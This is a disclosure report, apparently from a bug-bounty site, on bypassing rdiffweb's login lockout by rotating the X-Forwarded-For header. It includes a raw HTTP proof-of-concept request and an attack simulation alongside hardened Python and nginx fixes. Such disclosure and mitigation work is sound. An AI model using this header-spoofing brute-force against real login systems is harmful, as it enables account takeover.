Bypass IP detection to brute-force password in ikus060/rdiffweb

Valid

Reported on

Sep 14th 2022


Description

In the login API, an IP address is blocked by default after the user fails to log in more than 5 times. This mechanism can be bypassed by abusing the X-Forwarded-For header: the application takes the client address from that header, so changing its value on every request defeats the IP detection and allows a password brute-force.

Proof of Concept

POST /login/ HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=79c34d46cd0e592e066e1a7b128cffee4972d4f7
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://rdiffweb-demo.ikus-soft.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://rdiffweb-demo.ikus-soft.com/login/?redirect=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 127.0.0.202    (change this value on every attempt)
Connection: close

login=admin&password=admin123&redirect=%2F
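The request above works because the login rate limiter is keyed on a value the attacker controls. The following is an added example, not rdiffweb's own code: a minimal login limiter with the vulnerable client-IP lookup (header trusted unconditionally) next to a hardened lookup that only honours X-Forwarded-For when the TCP peer is a configured proxy, and then takes the right-most address that a trusted proxy did not add. The request class, the 10.0.0.0/8 proxy range, the 5-attempt threshold and the replayed attempts are all constructed for the example.

```python
"""Added example (not rdiffweb code): X-Forwarded-For based login lockout,
vulnerable and hardened. Names, ranges and sample requests are assumptions."""
from collections import defaultdict
import ipaddress

MAX_FAILURES = 5                                        # assumed threshold (report says "more than 5")
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumed reverse-proxy range


class Request:
    """Stand-in for a CherryPy/WSGI request object (constructed for the example)."""
    def __init__(self, remote_addr, headers=None):
        self.remote_addr = remote_addr      # TCP peer address, not spoofable
        self.headers = headers or {}        # attacker-controlled


def vulnerable_client_ip(req):
    # Trusts the header from anyone: every new value is a fresh failure bucket.
    return req.headers.get("X-Forwarded-For", req.remote_addr)


def hardened_client_ip(req, trusted_proxies=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only if the peer is a trusted proxy, then return
    the right-most hop that was not itself added by a trusted proxy."""
    peer = ipaddress.ip_address(req.remote_addr)
    if not any(peer in net for net in trusted_proxies):
        return req.remote_addr          # direct connection: header is meaningless
    hops = [h.strip() for h in req.headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):          # walk from the proxy side inward
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                       # malformed entry: fall back to the peer
        if not any(addr in net for net in trusted_proxies):
            return hop
    return req.remote_addr


class LoginLimiter:
    """Counts failed logins per client key and blocks once MAX_FAILURES is reached."""
    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(int)

    def attempt(self, req, password, real_password="s3cret"):
        key = self.key_func(req)
        if self.failures[key] >= MAX_FAILURES:
            return "blocked"
        if password == real_password:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "denied"


def attack_direct(key_func, n=8):
    """Attacker at 203.0.113.7 connects directly (no proxy) and rotates the
    X-Forwarded-For value on every guess, as in the PoC request."""
    limiter = LoginLimiter(key_func)
    results = []
    for i in range(n):
        req = Request("203.0.113.7", {"X-Forwarded-For": "127.0.0.%d" % (200 + i)})
        results.append(limiter.attempt(req, "guess%d" % i))
    return results


if __name__ == "__main__":
    print("vulnerable:", attack_direct(vulnerable_client_ip))   # never blocked
    print("hardened:  ", attack_direct(hardened_client_ip))     # blocked after 5
```

With the vulnerable key function all eight wrong guesses come back "denied" and the counter never reaches the threshold; with the hardened one the sixth guess is "blocked". The hardened lookup also handles the proxied case: a peer of 10.0.0.2 with the header "127.0.0.202, 203.0.113.7" resolves to 203.0.113.7, because the spoofed left-most entry is ignored. It still breaks if the proxy passes a client-supplied header through untouched, so the proxy must overwrite or append, never forward as-is.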

Video POC

https://drive.google.com/drive/folders/1q9u_1RZMAbCOwG0_ld_RupJEKF1WyM0b?usp=sharing

Impact

This vulnerability allows an attacker to brute-force the admin's password, perform denial of service attacks, ...

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a year ago
ikus060/rdiffweb maintainer has acknowledged this report a year ago
Patrik Dufresne
a year ago

Maintainer


@co0k13-cypher This is true only if Rdiffweb is not behind a reverse proxy. When rdiffweb is behind a reverse proxy the X-Forwarded-* headers get replaced by apache or nginx. In the case of https://rdiffweb-demo.ikus-soft.com/ the vulnerability is not reproducible.
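Whether a reverse proxy actually "replaces" the header depends on how it is configured. The following is an added nginx example, not rdiffweb's documented configuration, showing the overwriting form next to the commonly used appending form; the backend address and hostname are assumptions.

```nginx
# Added example, not from the rdiffweb project. Assumes rdiffweb listens on 127.0.0.1:8080.
server {
    listen 443 ssl;
    server_name rdiffweb.example.com;     # assumed hostname

    location / {
        proxy_pass http://127.0.0.1:8080;

        # Overwrites any client-supplied X-Forwarded-For with the TCP peer address,
        # so a spoofed value never reaches the application.
        proxy_set_header X-Forwarded-For $remote_addr;

        # The common alternative appends the peer address to whatever the client sent.
        # A spoofed value then survives as the first entry; that is only safe if the
        # application reads the right-most (proxy-added) hop, not the left-most one.
        # proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
```

A quick check against a deployment is to send a request with a bogus X-Forwarded-For through the proxy and confirm from the application's own request logging that the peer address, not the bogus value, is what the lockout is keyed on.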

Chiencp
a year ago

Researcher


In the demo video I'm doing the attack right on the https://rdiffweb-demo.ikus-soft.com/ site itself. While the vulnerability doesn't cover all cases, that doesn't mean it doesn't happen.

Patrik Dufresne validated this vulnerability a year ago

I confirm the vulnerability.

Chiencp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
a year ago

Maintainer


@co0k13-cypher Could you please change the affected version to 2.4.2 and earlier?

Patrik Dufresne marked this as fixed in 2.4.4 with commit 28258e a year ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability will not receive a CVE
Chiencp
a year ago

Researcher


I'm sorry, the report was closed so I can't edit it!

Patrik Dufresne
a year ago

Maintainer


@admin Could you help change the affected version to 2.4.2 and earlier?

Jamie Slome
a year ago

Admin


Sorted :)
